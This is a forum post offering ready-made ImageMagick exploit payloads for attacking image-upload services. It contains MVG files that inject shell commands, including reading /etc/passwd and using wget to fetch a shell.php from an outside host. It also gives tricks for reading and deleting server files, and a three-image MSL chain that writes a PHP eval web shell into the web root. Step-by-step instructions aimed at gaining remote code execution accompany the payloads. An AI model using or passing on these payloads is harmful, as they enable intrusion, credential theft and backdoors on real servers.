Jako Posted September 7, 2016 Report Posted September 7, 2016 (edited) Stiu ca s-a mai discutat pe forum despre asta, dar poate cuiva ii sunt folositoare informatiile. Should work for all image files (.jpg/.mvg/.svg/.png/etc.) Exploit Image contents: Spoiler push graphic-context viewbox 0 0 640 480 fill 'url(https://example.com/image.jpg "|YOUR COMMAND HERE")' Example Image: Spoiler push graphic-context viewbox 0 0 640 480 fill 'url(https://example.com/image.jpg "|cat /etc/passwd")' pop graphic-context More examples: Spoiler Example #1: push graphic-context viewbox 0 0 640 480 fill 'url(https://example.com/image.jpg "|cat /etc/passwd")' pop graphic-context Example #2: push graphic-context viewbox 0 0 640 480 fill 'url(https://example.com/image.jpg "|ls -la")' pop graphic-context Example #3: push graphic-context viewbox 0 0 640 480 fill 'url(https://example.com/image.jpg "|wget -O shell.php http://site.com/shell.txt")' pop graphic-context HOW TO: 1. Find an Image uploader that uses ImageMagick to process images. (Try it @ http://attack32.samsclass.info/im.htm) 2. Craft a malicious image file 3. If it is running a vulnerable version, you'll have full RCE! TRICKS: 1. It's possible to read arbitrary files from a web server by uploading an ImageMagick Vector Graphics file (MVG) that the web application processes with ImageMagick: Spoiler push graphic-context viewbox 0 0 1024 1024 image over 0,0 0,0 'label:@/etc/passwd' pop graphic-context As is the case with all of these vulnerabilities, the file doesn't need to be uploaded with a .mvg extension. You can change it to .png, .jpg, or anything else. If the file doesn't exist, you'll see the @ symbol plus the filename as the output. 2. You can use a similar technique to delete a file, provided ImageMagick is built with support for it's ephemeral protocol: Spoiler push graphic-context viewbox 0 0 1024 1024 image over 0,0 0,0 'ephemeral:/var/www/index.php' pop graphic-context 3. You can move files around, provided you're able to determine the location of uploaded files. This can be used to upload new files as well as overwrite existing files. first_image.png: Spoiler <?xml version="1.0" encoding="UTF-8"?> <image> <read filename="/var/www/uploads/second_image.png"/> <write filename="/var/www/hi.php"/> </image> second_image.png: Spoiler push graphic-context viewbox 0 0 1024 1024 image over 0,0 0,0 'label:<?php if($_SERVER["REQUEST_METHOD"]=="POST")eval(file_get_contents("php://input")); ?>' pop graphic-context third_image.png: Spoiler push graphic-context viewbox 0 0 1024 1024 image over 0,0 0,0 'msl:/var/www/uploads/first_image.png' pop graphic-context Additional info can be read here. HAVE FUN! Edited September 7, 2016 by Jako Quote
